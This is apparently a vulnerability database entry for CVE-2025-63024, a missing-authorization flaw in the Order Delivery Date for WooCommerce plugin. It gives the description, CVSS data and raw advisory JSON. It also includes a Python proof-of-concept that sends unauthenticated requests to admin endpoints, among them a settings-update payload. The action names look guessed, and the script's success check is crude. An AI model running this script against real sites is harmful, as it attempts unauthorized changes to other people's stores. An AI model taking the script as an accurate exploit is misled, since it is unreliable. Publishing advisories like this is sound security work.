Security Vulnerability Report
中文
CVE-2025-63024 CVSS 5.4 MEDIUM

CVE-2025-63024

Published: 2025-12-09 16:18:07
Last Modified: 2026-04-27 19:16:19

Description

Missing Authorization vulnerability in tychesoftwares Order Delivery Date for WooCommerce order-delivery-date-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Order Delivery Date for WooCommerce: from n/a through <= 4.3.1.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Order Delivery Date for WooCommerce < 4.3.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-63024 PoC - Missing Authorization in Order Delivery Date for WooCommerce # This PoC demonstrates accessing admin functionality without proper authorization import requests import sys TARGET_URL = "https://example-wordpress-site.com" # Replace with target URL def check_vulnerability(): """ Check if the target is vulnerable to CVE-2025-63024 """ # Common AJAX endpoint used by the plugin ajax_endpoints = [ "/wp-admin/admin-ajax.php", "/wp-json/wc-od/v1/" ] # Test unauthenticated access to admin functions headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Content-Type": "application/x-www-form-urlencoded" } # Example: Try to access order delivery date settings without auth # Note: Specific parameters depend on plugin version and configuration test_payloads = [ {"action": "wc_od_admin_get_delivery_dates", "post_id": "1"}, {"action": "wc_od_admin_update_settings", "delivery_date": "2025-12-25"} ] for endpoint in ajax_endpoints: url = f"{TARGET_URL}{endpoint}" for payload in test_payloads: try: response = requests.post(url, data=payload, headers=headers, timeout=10) # If response indicates success or data access without 401/403 if response.status_code == 200 and "unauthorized" not in response.text.lower(): print(f"[+] Potential vulnerability found at {url}") print(f"[+] Payload: {payload}") print(f"[+] Response: {response.text[:200]}") return True except requests.exceptions.RequestException as e: print(f"[-] Error accessing {url}: {e}") print("[-] No vulnerability detected or target not accessible") return False if __name__ == "__main__": print("CVE-2025-63024 Vulnerability Checker") print("=" * 50) check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63024", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:07.283", "lastModified": "2026-04-27T19:16:18.600", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in tychesoftwares Order Delivery Date for WooCommerce order-delivery-date-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Order Delivery Date for WooCommerce: from n/a through <= 4.3.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/order-delivery-date-for-woocommerce/vulnerability/wordpress-order-delivery-date-for-woocommerce-plugin-4-3-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}